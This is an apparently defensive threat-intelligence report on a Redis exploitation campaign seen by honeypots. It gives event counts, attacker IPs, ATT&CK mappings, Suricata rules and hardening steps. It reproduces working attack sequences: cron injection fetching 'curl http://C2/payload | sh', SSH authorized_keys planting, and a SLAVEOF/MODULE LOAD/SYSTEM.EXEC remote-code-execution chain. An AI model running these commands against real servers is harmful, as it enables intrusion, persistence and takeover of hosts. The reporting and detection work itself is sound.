TLP:CLEAR MEDIUM ACTIVE

Redis Rogue-Master Exploitation Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

234K

total events

3,550

unique IPs

117

rogue-master IPs

108

module-exec IPs

Executive Summary

Over a 30-day window, sensors observed large-scale Redis exploitation activity from 3,550 unique source IPs. The campaign comprises three distinct attack patterns: (1) cron/SSH key persistence via CONFIG SET + SET + SAVE, the classic Redis-to-cron attack; (2) rogue-master replication via SLAVEOF combined with MODULE LOAD and SYSTEM.EXEC for remote code execution; and (3) a binary protocol fuzzing attack targeting a Redis parser vulnerability with crafted RESP frames.

The rogue-master + module-exec pattern is particularly concerning — 117 IPs attempted SLAVEOF to establish a malicious replication relationship, and 108 IPs attempted MODULE LOAD + SYSTEM.EXEC for arbitrary code execution. The top operator (8.218.74.162) ran the full exploitation suite: 772 SLAVEOF + 514 MODULE + 4,124 CONFIG commands.

Threat Actor Profile

Attribute	Assessment
Campaign type	Mass Redis exploitation — three concurrent attack patterns
Actors	3,550 unique IPs; ~117 rogue-master operators; ~108 module-exec operators
Sophistication	Medium — known Redis attack techniques, but at scale and coordinated
Intent	Persistence (cron/SSH keys), RCE (module loading), scanner propagation
First observed	2026-05-25
Last observed	2026-06-24 (active)

Attack Pattern 1 — Cron / SSH Key Persistence

The classic Redis-to-cron attack exploits Redis's ability to write its dataset to arbitrary filesystem paths. The attacker manipulates dir and dbfilename to write a payload file into a cron directory or SSH directory:

# Cron persistence pattern (observed from 201.20.85.122 — 5,225 CONFIG events)
FLUSHALL                          # Clear existing data (1,151 events)
CONFIG SET dir /var/spool/cron    # Redirect dump to cron directory
CONFIG SET dbfilename root         # Write as root's crontab
SET x '\n* * * * * curl http://C2/payload | sh\n'  # Inject cron entry (4,636 SET events)
SAVE                               # Force write to disk (2,913 SAVE events)

# SSH key persistence variant:
CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys
SET x '\nssh-rsa AAAAB3NzaC1yc2EAAAA...\n'
SAVE

Top Cron Persistence Operators

IP	CONFIG	SET	SAVE	FLUSHALL	Notes
`201.20.85.122`	5,225	4,636	2,913	1,151	Full cron injection suite
`8.218.74.162`	4,124	—	—	—	Also top rogue-master operator
`47.86.176.78`	1,152	—	—	—	Also rogue-master operator
`106.75.16.140`	920	—	—	—	Also rogue-master operator
`87.249.134.4`	836	—	—	—	Full suite: CONFIG + INFO + SLAVEOF + MODULE

Attack Pattern 2 — Rogue Master + Module Execution

The rogue-master attack uses SLAVEOF to turn the target Redis into a replica of the attacker's server. The attacker's server sends a malicious RDB (Redis Database) file during replication, which can contain a compiled Redis module (.so file). Once loaded via MODULE LOAD, the module registers a SYSTEM.EXEC command that executes arbitrary shell commands on the host:

# Rogue-master replication + module execution
SLAVEOF 8.218.74.162 6379          # Become replica of attacker (772 events)
                                   # Attacker sends malicious RDB with .so module
MODULE LOAD /path/to/malicious.so  # Load the module (514 events)
SYSTEM.EXEC 'curl http://C2/payload | sh'  # Execute arbitrary commands (1,214 events)
SLAVEOF NO ONE                     # Break replication

Top Rogue-Master / Module-Exec Operators

IP	SLAVEOF	MODULE	CONFIG	INFO	Notes
`8.218.74.162`	772	514	4,124	—	Most active — full exploitation suite
`47.86.176.78`	216	144	1,152	—	—
`39.108.85.106`	142	96	—	—	—
`87.249.134.4`	117	60	836	8,575	Heavy INFO scanning + full exploit suite
`106.75.16.140`	86	57	920	—	—
`47.242.120.223`	69	46	—	—	—
`23.234.72.111`	56	28	—	2,124	—
`103.228.37.7`	12	—	—	—	SLAVEOF only

Attack Pattern 3 — Binary Protocol Fuzzing

A distinct cluster of IPs (17 total) sends crafted binary RESP frames that do not conform to the Redis protocol specification. The payload \x03*%\xe0COOKIE: combines an invalid RESP type byte (\x03), a MULTI/EXEC marker (*), a crafted length field (%\xe0), and a plaintext COOKIE: string. This is not standard Redis protocol — it appears to be a targeted fuzzing attempt or an exploit for a specific Redis parser vulnerability.

# Binary protocol attack (11,119 events from 17 IPs)
\x03 * % \xe0 COOKIE:

# Byte breakdown:
\x03  = invalid RESP type (valid types: + - : $ *)
*    = MULTI/EXEC array marker
%    = invalid character in array length context
\xe0  = high byte — likely crafted to trigger integer overflow in parser
COOKIE: = plaintext string appended after binary frame

Binary Fuzzing IPs

IP	Events	Notes
`88.214.25.123`	1,737	Both redis.command and redis.unknown_verb variants
`194.165.16.165`	1,727	—
`194.165.16.166`	1,665	Adjacent IP — same /24 subnet
`194.165.16.167`	1,604	Adjacent IP — same /24 subnet
`45.227.254.155`	1,576	—

Command Distribution

Command	Events	Unique IPs	Purpose
`CONFIG`	27,452	311	Set dir/dbfilename for persistence
`INFO`	19,078	1,564	Server profiling / version detection
`SET`	15,631	269	Payload injection into Redis keys
`SAVE`	9,937	244	Force dataset write to filesystem
`FLUSHALL`	3,844	142	Destructive flush before injection
`PING`	2,891	905	Connectivity check / scanner probe
`GET`	2,067	513	Data exfiltration attempt
`SLAVEOF`	2,008	117	Rogue-master replication
`SYSTEM.EXEC`	1,214	108	Command execution via loaded module
`MODULE`	1,308	115	Load malicious .so module
`\x03*%\xe0COOKIE:`	11,119	17	Binary protocol fuzzing

MITRE ATT&CK Mapping

ID	Technique	Evidence
T1190	Exploit Public-Facing Application	Unauthenticated Redis API exploitation (no AUTH required)
T1105	Ingress Tool Transfer	`SLAVEOF` transfers malicious RDB / .so module from rogue master
T1059.004	Unix Shell	`SYSTEM.EXEC` executes arbitrary shell commands via loaded module
T1053.003	Cron	`CONFIG SET dir /var/spool/cron` + `SAVE` writes cron entry
T1098.004	SSH Authorized Keys	`CONFIG SET dir /root/.ssh` + `SAVE` writes authorized_keys
T1210	Exploitation of Remote Services	Module loading (`MODULE LOAD`) for code execution on Redis server
T1046	Network Service Discovery	8,575 `INFO` commands from 1,564 IPs — mass Redis server discovery

Indicators of Compromise

Rogue-Master / Module-Exec IPs

8.218.74.162 — 772 SLAVEOF + 514 MODULE + 4,124 CONFIG (most active)

47.86.176.78 — 216 SLAVEOF + 144 MODULE + 1,152 CONFIG

39.108.85.106 — 142 SLAVEOF + 96 MODULE

87.249.134.4 — 117 SLAVEOF + 60 MODULE + 836 CONFIG + 8,575 INFO

106.75.16.140 — 86 SLAVEOF + 57 MODULE + 920 CONFIG

47.242.120.223 — 69 SLAVEOF + 46 MODULE

23.234.72.111 — 56 SLAVEOF + 28 MODULE + 2,124 INFO

103.228.37.7 — 12 SLAVEOF

Cron Persistence IPs

201.20.85.122 — 5,225 CONFIG + 4,636 SET + 2,913 SAVE + 1,151 FLUSHALL

Binary Protocol Fuzzing IPs

88.214.25.123 · 194.165.16.165 · 194.165.16.166 · 194.165.16.167 · 45.227.254.155

Protocol IOC

\x03*%\xe0COOKIE: — binary RESP fuzzing payload

SLAVEOF + MODULE LOAD + SYSTEM.EXEC — rogue-master RCE chain

CONFIG SET dir /var/spool/cron — cron persistence pattern

CONFIG SET dir /root/.ssh — SSH key persistence pattern

Detection Signatures

Suricata — Redis SLAVEOF from External Source

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis SLAVEOF rogue-master replication attack";
  flow:to_server,established;
  content:"SLAVEOF";
  nocase;
  threshold:type both, track by_src, count 3, seconds 60;
  classtype:trojan-activity; sid:9003050001; rev:1;
)

Suricata — Redis MODULE LOAD + SYSTEM.EXEC

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis MODULE LOAD for code execution";
  flow:to_server,established;
  content:"MODULE";
  nocase;
  content:"LOAD"; distance:0;
  classtype:trojan-activity; sid:9003050002; rev:1;
)

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis SYSTEM.EXEC module command execution";
  flow:to_server,established;
  content:"SYSTEM.EXEC";
  nocase;
  classtype:trojan-activity; sid:9003050003; rev:1;
)

Suricata — Redis CONFIG SET dir (Cron/SSH Persistence)

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis CONFIG SET directory manipulation (cron/SSH persistence)";
  flow:to_server,established;
  content:"CONFIG";
  nocase;
  content:"SET"; distance:0;
  content:"dir"; distance:0;
  pcre:"/dir\s+\/(var\/spool\/cron|root\/\.ssh|etc\/cron\.d)/i";
  classtype:trojan-activity; sid:9003050004; rev:1;
)

Suricata — Binary Protocol Fuzzing

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis binary protocol fuzzing (RESP frame anomaly)";
  flow:to_server,established;
  content:"|03 2a 25 e0|";
  content:"COOKIE:"; distance:0;
  threshold:type both, track by_src, count 10, seconds 60;
  classtype:attempted-exploit; sid:9003050005; rev:1;
)

Redis Hardening Recommendations

# 1. Bind to localhost only — never expose to 0.0.0.0
bind 127.0.0.1

# 2. Require authentication
requirepass <strong-password>

# 3. Disable dangerous commands
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command MODULE ""
rename-command SYSTEM.EXEC ""

# 4. Disable CONFIG SET for dir/dbfilename (Redis 7+)
enable-protected-configs yes

# 5. Firewall port 6379 — deny all external access
iptables -A INPUT -p tcp --dport 6379 ! -s 127.0.0.1 -j DROP

Collection Methodology

Data collected by a distributed honeypot fleet running custom protocol lures that emulate exposed Redis instances. All Redis commands — including both valid RESP-protocol commands and invalid binary frames — were captured at the application layer and ingested into a time-series database. Command frequencies, source IP correlation, and attack pattern clustering were performed offline to identify the three distinct attack patterns documented in this report.